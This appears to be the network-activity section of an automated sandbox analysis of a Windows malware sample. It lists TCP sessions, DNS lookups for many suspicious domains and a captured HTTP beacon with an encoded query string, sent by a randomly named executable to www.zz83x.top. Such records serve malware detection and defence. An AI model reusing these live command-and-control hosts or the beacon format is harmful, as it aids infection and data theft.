                                                                                                                            Nov 12, 2024 15:34:40.832293987 CET8049798203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:40.832489014 CET4979880192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:42.156538010 CET4979880192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:43.174330950 CET4979980192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:43.352835894 CET8049799203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:43.353087902 CET4979980192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:43.361594915 CET4979980192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:43.361666918 CET4979980192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:43.540148020 CET8049799203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:43.540189981 CET8049799203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:43.540219069 CET8049799203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:43.540290117 CET8049799203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:43.540414095 CET8049799203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:43.554152966 CET8049799203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:43.554260969 CET8049799203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:43.554421902 CET4979980192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:44.874877930 CET4979980192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:45.892288923 CET4980080192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:46.070839882 CET8049800203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:46.071099043 CET4980080192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:46.076700926 CET4980080192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:46.255086899 CET8049800203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:46.269095898 CET8049800203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:46.269201994 CET8049800203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:46.269428968 CET4980080192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:46.271390915 CET4980080192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:46.449990988 CET8049800203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:51.281718016 CET4980180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:51.416915894 CET804980113.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:51.417068005 CET4980180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:51.425786018 CET4980180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:51.560501099 CET804980113.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:51.561923027 CET804980113.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:51.562135935 CET4980180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:52.935527086 CET4980180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:53.069900990 CET804980113.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:53.952929974 CET4980280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:54.088368893 CET804980213.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:54.088669062 CET4980280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:54.096358061 CET4980280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:54.230653048 CET804980213.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:54.230989933 CET804980213.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:54.231250048 CET4980280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:55.606791973 CET4980280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:55.741446972 CET804980213.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:56.624305010 CET4980380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:56.769640923 CET804980313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:56.769854069 CET4980380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:56.777841091 CET4980380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:56.777877092 CET4980380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:56.912178040 CET804980313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:56.912271023 CET804980313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:56.912471056 CET804980313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:56.912636995 CET804980313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:56.912652016 CET804980313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:59.311250925 CET4980480192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:59.446716070 CET804980413.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:59.446938038 CET4980480192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:59.452414036 CET4980480192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:59.586776972 CET804980413.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:59.588041067 CET804980413.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:59.588058949 CET804980413.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:59.588413954 CET4980480192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:59.590455055 CET4980480192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:34:59.724714041 CET804980413.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:04.607173920 CET4980580192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:04.741378069 CET8049805173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:04.741554976 CET4980580192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:04.749439001 CET4980580192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:04.884165049 CET8049805173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:04.884205103 CET8049805173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:04.884433031 CET4980580192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:06.260747910 CET4980580192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:07.278178930 CET4980680192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:07.414155960 CET8049806173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:07.414331913 CET4980680192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:07.422977924 CET4980680192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:07.558279037 CET8049806173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:07.558289051 CET8049806173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:07.558451891 CET4980680192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:08.933830976 CET4980680192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:09.949781895 CET4980780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:10.083897114 CET8049807173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:10.084074020 CET4980780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:10.092005014 CET4980780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:10.092051983 CET4980780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:10.092098951 CET4980780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:10.092307091 CET4980780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:10.226151943 CET8049807173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:10.226186991 CET8049807173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:10.226383924 CET8049807173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:10.226418972 CET8049807173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:10.226948023 CET8049807173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:10.226985931 CET8049807173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:10.227185965 CET4980780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:11.603425980 CET4980780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:12.620784998 CET4980880192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:12.755428076 CET8049808173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:12.755633116 CET4980880192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:12.760833979 CET4980880192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:12.896985054 CET8049808173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:12.897022963 CET8049808173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:12.897242069 CET4980880192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:12.899101019 CET4980880192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:35:13.032769918 CET8049808173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:17.916747093 CET4980980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:18.037908077 CET80498093.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:18.038038969 CET4980980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:18.046612978 CET4980980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:18.163783073 CET80498093.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:18.182960033 CET80498093.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:18.183173895 CET4980980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:19.554699898 CET4980980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:19.672676086 CET80498093.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:20.572467089 CET4981080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:20.693284988 CET80498103.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:20.693484068 CET4981080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:20.702032089 CET4981080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:20.820835114 CET80498103.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:20.843422890 CET80498103.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:20.843610048 CET4981080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:22.210326910 CET4981080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:22.328039885 CET80498103.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:23.228051901 CET4981180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:23.345619917 CET80498113.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:23.345885038 CET4981180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:23.354790926 CET4981180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:23.354824066 CET4981180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:23.354899883 CET4981180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:23.472784042 CET80498113.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:23.472798109 CET80498113.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:23.472807884 CET80498113.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:23.472817898 CET80498113.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:23.472826958 CET80498113.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:23.472836971 CET80498113.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:23.472846985 CET80498113.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:23.491018057 CET80498113.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:23.491254091 CET4981180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:24.866017103 CET4981180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:24.983103991 CET80498113.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:25.883443117 CET4981280192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:26.019419909 CET80498123.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:26.019581079 CET4981280192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:26.025338888 CET4981280192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:26.160465956 CET80498123.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:26.164432049 CET80498123.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:26.164526939 CET80498123.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:35:26.164832115 CET4981280192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:26.168703079 CET4981280192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:35:26.303931952 CET80498123.33.130.190192.168.11.20
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 12, 2024 15:29:48.965755939 CET5162653192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:29:49.156141996 CET53516261.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:04.829036951 CET5907053192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:30:05.842056990 CET5907053192.168.11.209.9.9.9
                                                                                                                            Nov 12, 2024 15:30:05.843352079 CET53590701.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:07.367141008 CET53590709.9.9.9192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:20.106770992 CET5294753192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:30:20.827536106 CET53529471.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:35.056752920 CET6519353192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:30:35.229789019 CET53651931.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:49.069698095 CET6368553192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:30:49.243469954 CET53636851.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:04.003473997 CET5702553192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:31:04.166251898 CET53570251.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:17.703567028 CET5519353192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:31:17.869975090 CET53551931.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:31.185004950 CET6352953192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET53635291.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:44.666758060 CET5328053192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:31:44.848546982 CET53532801.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:58.101063013 CET6156953192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:31:58.304486990 CET53615691.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:12.113635063 CET5721053192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:32:12.272831917 CET53572101.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:25.503344059 CET5843753192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:32:25.695216894 CET53584371.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:38.982966900 CET5980853192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:32:39.214004993 CET53598081.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:52.510981083 CET5994653192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:32:52.706249952 CET53599461.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:06.008047104 CET6242353192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:33:06.283941031 CET53624231.1.1.1192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:19.567660093 CET5112653192.168.11.201.1.1.1
                                                                                                                            Nov 12, 2024 15:33:19.816052914 CET53511261.1.1.1192.168.11.20
                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Nov 12, 2024 15:29:48.965755939 CET192.168.11.201.1.1.10xbb58Standard query (0)www.zz83x.topA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:30:04.829036951 CET192.168.11.201.1.1.10x8a24Standard query (0)www.wukong.collegeA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:30:05.842056990 CET192.168.11.209.9.9.90x8a24Standard query (0)www.wukong.collegeA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:30:20.106770992 CET192.168.11.201.1.1.10xe89bStandard query (0)www.qiusuo.vipA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:30:35.056752920 CET192.168.11.201.1.1.10xe0a6Standard query (0)www.pg874.shopA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:30:49.069698095 CET192.168.11.201.1.1.10x216Standard query (0)www.rimberiokitchen.onlineA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:04.003473997 CET192.168.11.201.1.1.10x1cffStandard query (0)www.futurevision.lifeA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:17.703567028 CET192.168.11.201.1.1.10x712eStandard query (0)www.dreampay.shopA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.185004950 CET192.168.11.201.1.1.10xdc55Standard query (0)www.jigg.spaceA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:44.666758060 CET192.168.11.201.1.1.10x152aStandard query (0)www.econsultoria.onlineA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:58.101063013 CET192.168.11.201.1.1.10x4c05Standard query (0)www.webworld.digitalA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:32:12.113635063 CET192.168.11.201.1.1.10xcd97Standard query (0)www.smartbuyoffer.onlineA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:32:25.503344059 CET192.168.11.201.1.1.10xc418Standard query (0)www.makerpay.xyzA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:32:38.982966900 CET192.168.11.201.1.1.10x8a32Standard query (0)www.jiujiuxi.loveA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:32:52.510981083 CET192.168.11.201.1.1.10xdd4cStandard query (0)www.moneys.fitA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:33:06.008047104 CET192.168.11.201.1.1.10x3236Standard query (0)www.vnxoso88.artA (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:33:19.567660093 CET192.168.11.201.1.1.10x9314Standard query (0)www.ebook.farmA (IP address)IN (0x0001)false
                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Nov 12, 2024 15:29:49.156141996 CET1.1.1.1192.168.11.200xbb58No error (0)www.zz83x.topzz83x.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:29:49.156141996 CET1.1.1.1192.168.11.200xbb58No error (0)zz83x.top206.119.81.121A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:30:05.843352079 CET1.1.1.1192.168.11.200x8a24No error (0)www.wukong.college47.52.221.8A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:30:07.367141008 CET9.9.9.9192.168.11.200x8a24No error (0)www.wukong.college47.52.221.8A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:30:20.827536106 CET1.1.1.1192.168.11.200xe89bNo error (0)www.qiusuo.vip154.38.64.6A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:30:35.229789019 CET1.1.1.1192.168.11.200xe0a6No error (0)www.pg874.shoppg874.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:30:35.229789019 CET1.1.1.1192.168.11.200xe0a6No error (0)pg874.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:30:49.243469954 CET1.1.1.1192.168.11.200x216No error (0)www.rimberiokitchen.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:04.166251898 CET1.1.1.1192.168.11.200x1cffNo error (0)www.futurevision.life203.161.49.193A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:17.869975090 CET1.1.1.1192.168.11.200x712eNo error (0)www.dreampay.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:17.869975090 CET1.1.1.1192.168.11.200x712eNo error (0)www.dreampay.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET1.1.1.1192.168.11.200xdc55No error (0)www.jigg.space173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET1.1.1.1192.168.11.200xdc55No error (0)www.jigg.space45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET1.1.1.1192.168.11.200xdc55No error (0)www.jigg.space45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET1.1.1.1192.168.11.200xdc55No error (0)www.jigg.space198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET1.1.1.1192.168.11.200xdc55No error (0)www.jigg.space45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET1.1.1.1192.168.11.200xdc55No error (0)www.jigg.space96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET1.1.1.1192.168.11.200xdc55No error (0)www.jigg.space72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET1.1.1.1192.168.11.200xdc55No error (0)www.jigg.space45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET1.1.1.1192.168.11.200xdc55No error (0)www.jigg.space45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET1.1.1.1192.168.11.200xdc55No error (0)www.jigg.space45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET1.1.1.1192.168.11.200xdc55No error (0)www.jigg.space45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:31.379456997 CET1.1.1.1192.168.11.200xdc55No error (0)www.jigg.space72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:44.848546982 CET1.1.1.1192.168.11.200x152aNo error (0)www.econsultoria.onlineeconsultoria.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:44.848546982 CET1.1.1.1192.168.11.200x152aNo error (0)econsultoria.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:44.848546982 CET1.1.1.1192.168.11.200x152aNo error (0)econsultoria.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:58.304486990 CET1.1.1.1192.168.11.200x4c05No error (0)www.webworld.digitalwebworld.digitalCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:31:58.304486990 CET1.1.1.1192.168.11.200x4c05No error (0)webworld.digital84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:32:12.272831917 CET1.1.1.1192.168.11.200xcd97No error (0)www.smartbuyoffer.onlinesmartbuyoffer.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:32:12.272831917 CET1.1.1.1192.168.11.200xcd97No error (0)smartbuyoffer.online108.179.252.152A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:32:25.695216894 CET1.1.1.1192.168.11.200xc418No error (0)www.makerpay.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:32:25.695216894 CET1.1.1.1192.168.11.200xc418No error (0)www.makerpay.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:32:39.214004993 CET1.1.1.1192.168.11.200x8a32No error (0)www.jiujiuxi.love199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:32:52.706249952 CET1.1.1.1192.168.11.200xdd4cNo error (0)www.moneys.fitmoneys.fitCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:32:52.706249952 CET1.1.1.1192.168.11.200xdd4cNo error (0)moneys.fit3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:32:52.706249952 CET1.1.1.1192.168.11.200xdd4cNo error (0)moneys.fit15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:33:06.283941031 CET1.1.1.1192.168.11.200x3236No error (0)www.vnxoso88.art77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:33:06.283941031 CET1.1.1.1192.168.11.200x3236No error (0)77980.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                            Nov 12, 2024 15:33:19.816052914 CET1.1.1.1192.168.11.200x9314No error (0)www.ebook.farm199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                            • www.zz83x.top
                                                                                                                            • www.wukong.college
                                                                                                                            • www.qiusuo.vip
                                                                                                                            • www.pg874.shop
                                                                                                                            • www.rimberiokitchen.online
                                                                                                                            • www.futurevision.life
                                                                                                                            • www.dreampay.shop
                                                                                                                            • www.jigg.space
                                                                                                                            • www.econsultoria.online
                                                                                                                            • www.webworld.digital
                                                                                                                            • www.smartbuyoffer.online
                                                                                                                            • www.makerpay.xyz
                                                                                                                            • www.jiujiuxi.love
                                                                                                                            • www.moneys.fit
                                                                                                                            • www.vnxoso88.art
                                                                                                                            • www.ebook.farm
                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.11.2049719206.119.81.121802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:29:49.480458975 CET472OUTGET /mk81/?mRu=gzc9tI9/iKFBs/CfQiHfQ1hmFq4huhxeMTnwpTnTnn57GmdDkYbUUImaMzeYKxMl89CL7o6kx1g4xig0s43SWJ3EiMJuN9y4NOM7gvWFzz5YCjlwg0gKJrc=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.zz83x.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:29:49.793483973 CET312INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Nov 2024 14:29:49 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 148
                                                                                                                            Connection: close
                                                                                                                            ETag: "66f0ea70-94"
                                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
